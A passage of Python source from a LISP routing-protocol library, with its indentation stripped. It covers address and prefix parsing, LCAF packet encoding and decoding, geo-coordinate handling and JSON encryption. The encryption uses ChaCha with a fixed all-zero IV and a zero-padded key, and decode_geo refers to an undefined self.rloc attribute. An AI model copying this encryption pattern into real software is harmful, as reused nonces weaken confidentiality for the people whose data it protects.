return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
# Allow user to specify ff::/8 which allows for placing the the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#enif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to give
# if the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html, do_formatting):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = ""
if (rle_node.rloc_name != None):
rle_name_str = rle_node.rloc_name
if (do_formatting): rle_name_str = blue(rle_name_str, html)
rle_name_str = "({})".format(rle_name_str)
#endif
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}{}, ".format(addr_str, "" if port == 0 else \
":" + str(port), rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string, encrypted=False, ms_encrypt=False):
self.json_name = name
self.json_string = string
self.json_encrypted = False
#
# Decide to encrypt or decrypt. The map-server encrypts and stores
# ciphertext in mapping system. The lig client decrypts to show user
# data if it has the key in env variable LISP_JSON_KEY. Format of
# env variable is "<key>" or "[<key-id>]<key>".
#
# If the LISP site-eid is not configured to encrypt the JSON than
# store in plaintext.
#
if (len(lisp_ms_json_keys) != 0):
if (ms_encrypt == False): return
self.json_key_id = lisp_ms_json_keys.keys()[0]
self.json_key = lisp_ms_json_keys[self.json_key_id]
self.encrypt_json()
#endif
if (lisp_log_id == "lig" and encrypted):
key = os.getenv("LISP_JSON_KEY")
if (key != None):
index = -1
if (key[0] == "[" and "]" in key):
index = key.find("]")
self.json_key_id = int(key[1:index])
#endif
self.json_key = key[index+1::]
#endif
self.decrypt_json()
#endif
#endif
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
def encrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = jd[key]
value = chacha.ChaCha(ekey, iv).encrypt(value)
jd[key] = binascii.hexlify(value)
#endfor
self.json_string = json.dumps(jd)
self.json_encrypted = True
#enddef
def decrypt_json(self):
ekey = self.json_key.zfill(32)
iv = "0" * 8
jd = json.loads(self.json_string)
for key in jd:
value = binascii.unhexlify(jd[key])
jd[key] = chacha.ChaCha(ekey, iv).encrypt(value)
#endfor
try:
self.json_string = json.dumps(jd)
self.json_encrypted = False
except:
pass
#endtry
#enddef
#endclass
